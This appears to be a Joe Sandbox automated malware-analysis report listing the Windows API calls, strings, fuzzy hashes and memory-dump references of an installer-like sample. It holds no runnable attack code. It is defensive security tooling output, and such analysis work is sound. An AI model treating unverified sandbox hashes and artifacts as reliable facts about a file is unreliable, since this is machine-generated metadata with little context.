                                                                                                    • API ID: 753815007538152075381540
                                                                                                    • String ID: %E
                                                                                                    • API String ID: 3367396946-175436132
                                                                                                    • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                    • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                                    • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                                    • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0044B401
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectReleaseSelect
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 1831053106-1959103961
                                                                                                    • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                    • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                    • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                    • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                    • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                    • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DrawText$ByteCharMultiWide
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 65125430-1959103961
                                                                                                    • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                    • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                    • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                    • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                    APIs
                                                                                                    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 395431579-1506664499
                                                                                                    • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                    • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                    • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                    • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                    Strings
                                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                    • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                    • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                    • API String ID: 47109696-2115312317
                                                                                                    • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                    • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                    • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                    • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                    • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                    • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                    • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                    • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                    • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                    • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                    • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                    • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                    • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                    • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 00421361
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu
                                                                                                    • String ID:
                                                                                                    • API String ID: 3711407533-0
                                                                                                    • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                    • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                    • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                    • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$CallMessageProcSendTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 601730667-0
                                                                                                    • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                    • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                    • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                    • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                    • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 4071923889-0
                                                                                                    • Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                    • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                    • Opcode Fuzzy Hash: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                    • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0042311E
                                                                                                    • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceEnumFontsRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2698912916-0
                                                                                                    • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                    • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                    • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                    • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 730355536-0
                                                                                                    • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                    • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                    • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                    • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                    Strings
                                                                                                    • NumRecs range exceeded, xrefs: 0045C396
                                                                                                    • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlush
                                                                                                    • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                    • API String ID: 3593489403-659731555
                                                                                                    • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                    • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                    • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                    • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                      • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                      • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                      • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                      • Part of subcall function 004063C4: 6FB81CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                      • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                      • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                      • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                      • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                      • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                      • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                      • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                      • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                      • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                      • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                      • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                      • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                      • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                      • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                      • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                      • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                      • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                      • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                      • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                      • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                      • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                      • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                      • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
